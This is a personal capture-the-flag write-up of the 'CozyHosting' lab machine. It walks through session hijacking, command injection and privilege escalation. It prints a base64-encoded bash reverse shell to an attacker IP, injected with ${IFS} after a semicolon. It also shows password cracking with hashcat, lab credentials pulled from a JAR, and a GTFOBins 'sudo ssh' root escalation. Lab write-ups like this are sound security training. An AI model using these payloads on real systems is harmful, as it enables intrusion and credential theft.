CozyHosting (WiP) - TheBackBrain

> [!info] Open Ports > SSH (22) ver: OpenSSH 8.9p1 > HTTP (80) ver: nginx 1.18.0 ## Directory Enum **interesting directories** `http://cozyhosting.htb/actuator/` `http://cozyhosting.htb/actuator/sessions` - shows hashed cookie values for kanderson and unauthorized. - Manipulation of these cookie values allows access the admin page where there is an SSH form. ## 1st RevShell ![[CHburpRevShell.png]] Bash -i revshell, base64 encoded, then URL encoded. We need the URL without whitespace, so adding ${IFS} to the beginning makes this work >[!info] Reverse Shell Process >`bash -i >& /dev/tcp/10.10.14.143/4444 0>&1` >Then... Base64 Encode >`YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNDMvNDQ0NCAwPiYx` >Then... URL Encode while adding `echo${IFS} and ${IFS}` >`;echo${IFS}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNDMvNDQ0NCAwPiYx"|base64${IFS}-d|bash` > You then catch a revshell once you send this Request. Either from the newly accessed web page or from repeater in burpsuite. I would suggest repeater in burpsuite as you can see the response if there are any errors, for example, I had to fiddle with the $IFS placement as well as semicolons. ### Investigation as APP The directory we are dropped into is `/app`. In here there is a .JAR file called: `cloudhosting-0.0.1.jar` Moving this over to our machine for a closer look (`python3 -m http.server 4545`) I viewed the contents with a package called "jd-gui" In `BOOT.INF/classes/application.properties` we find a ton of helpful information about the postgresql server. ``` server.address=127.0.0.1 server.servlet.session.timeout=5m management.endpoints.web.exposure.include=health,beans,env,sessions,mappings management.endpoint.sessions.enabled = true spring.datasource.driver-class-name=org.postgresql.Driver spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect spring.jpa.hibernate.ddl-auto=none spring.jpa.database=POSTGRESQL spring.datasource.platform=postgres spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting spring.datasource.username=postgres spring.datasource.password=Vg&nvzAQ7XxR ``` as well as in `BOOT.INF/classes/htb.cloudhosting/scheduled/FakeUser.class` the line: ` Runtime.getRuntime().exec(new String[] { "curl", "localhost:8080/login", "--request", "POST", "--header", "Content-Type: application/x-www-form-urlencoded", "--data-raw", "username=kanderson&password=MRdEQuv6~6P9", "-v" });` the FakeUser seems like a rabbit hole so I didnt investigate further however the psql credentials are extremely helpful. I used them by... **on the revshell (app)** `psql -h 127.0.0.1 -U postgres` (credentials from above) once logged in we can see the available databases with `\list` ![[CHpsqlDB.png]] Switching to the cozyhosting DB: `\c cozyhosting` we can then see another list of relations with `\d` ![[CHpsqlRel.png]] Lets see what is in users... ![[CHpsqlUsr.png]] BOOM! we found some hashed passwords. from the jar file we know kanderson is part of FakeUser.class so we can ignore that. Writing the admin pw to a file and then running hashcat `hashcat -a 0 -m 3200 psqlAdmin /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt` Hashcat cracks it and outputs: manchesterunited Back on the victim, we run `cat /etc/passwd` To get a list of possible users to try this password on. ``` josh:x:1003:1003::/home/josh:/usr/bin/bash _laurel:x:998:998::/var/log/laurel:/bin/false ``` `_Laurel` Does not have a shell to login to, so lets try josh. `su - josh` Once logged in we can ex filtrate the user flag. ## Priv ESC SUID binary search yielded nothing useful however `sudo -l` showed that SSH could be run as sudo. This sparked my memory for a site called gtfo bins. [ssh | GTFOBins](https://gtfobins.github.io/gtfobins/ssh/) At the bottom... IF we can run ssh as sudo (which we can) `sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x` Once run, we are dropped into a root shell and can ex filtrate the root flag! # Lessons Learned 1) How sql queries work <-- Learn MORE 2) Basic postgresql usage <-- Learn MORE 3) gtfobins 4) A whole ton of hash cracking 5) I think I need to find a better web directory brute forcing list.